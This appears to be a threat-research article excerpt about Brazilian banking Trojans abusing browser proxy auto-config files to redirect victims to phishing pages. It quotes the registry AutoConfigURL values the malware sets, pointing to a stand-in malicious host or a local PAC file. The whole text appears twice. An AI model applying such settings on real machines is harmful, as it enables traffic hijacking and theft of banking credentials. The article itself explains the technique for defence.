Proxy auto-config (PAC) files are a modern resource that exist on all modern browsers. They define how web browsers and other user agents can automatically choose the appropriate proxy server (access method) to fetch a given URL.
Although PAC is a legitimate feature, the abuse of PAC files has been known since 2005. The technique was improved and refined by Brazilian cybercriminals, and then it was shared with cybercriminals from Turkey and Russia.
These attacks have reached a hitherto unseen level of complexity and effectiveness, making it possible to use a 1 KB file to hack an entire bank account. Combining a lot of creativity with drive-by download attacks, these malicious scripts can do more than simple man-in-the-middle raids; they are able to impersonate HTTPS connections in silent, web-based attacks which can be launched regularly and successfully. Generally these redirect users to the phishing pages of banks, credit card companies, etc.
In Brazil malicious PAC files in Trojan bankers have been increasingly common since 2009, when several families such as Trojan.Win32.ProxyChanger started to force the URLs of PAC files in the browser of infected machines.
Today at least 6 out of 10 Brazilian Trojan bankers have a feature which can add a malicious PAC to the browser’s config.
This attack is very simple; all a Trojan needs to do is to change this single value on the Windows Registry, adding an URL to the PAC file:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: “AutoConfigURL = http://www.badsite.com/pacscript.pac
Or adding a path to a small file (generally less than 1 KB), hosted locally:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = file://C:/WINDOWS/proxy.pac
Some attacks also change the values of the key below, which is responsible for setting an auto-proxy in the Internet connection’s name:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\{CONNECTION NAME}
Read More
Although PAC is a legitimate feature, the abuse of PAC files has been known since 2005. The technique was improved and refined by Brazilian cybercriminals, and then it was shared with cybercriminals from Turkey and Russia.
These attacks have reached a hitherto unseen level of complexity and effectiveness, making it possible to use a 1 KB file to hack an entire bank account. Combining a lot of creativity with drive-by download attacks, these malicious scripts can do more than simple man-in-the-middle raids; they are able to impersonate HTTPS connections in silent, web-based attacks which can be launched regularly and successfully. Generally these redirect users to the phishing pages of banks, credit card companies, etc.
In Brazil malicious PAC files in Trojan bankers have been increasingly common since 2009, when several families such as Trojan.Win32.ProxyChanger started to force the URLs of PAC files in the browser of infected machines.
Today at least 6 out of 10 Brazilian Trojan bankers have a feature which can add a malicious PAC to the browser’s config.
This attack is very simple; all a Trojan needs to do is to change this single value on the Windows Registry, adding an URL to the PAC file:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: “AutoConfigURL = http://www.badsite.com/pacscript.pac
Or adding a path to a small file (generally less than 1 KB), hosted locally:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = file://C:/WINDOWS/proxy.pac
Some attacks also change the values of the key below, which is responsible for setting an auto-proxy in the Internet connection’s name:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\{CONNECTION NAME}
Read More
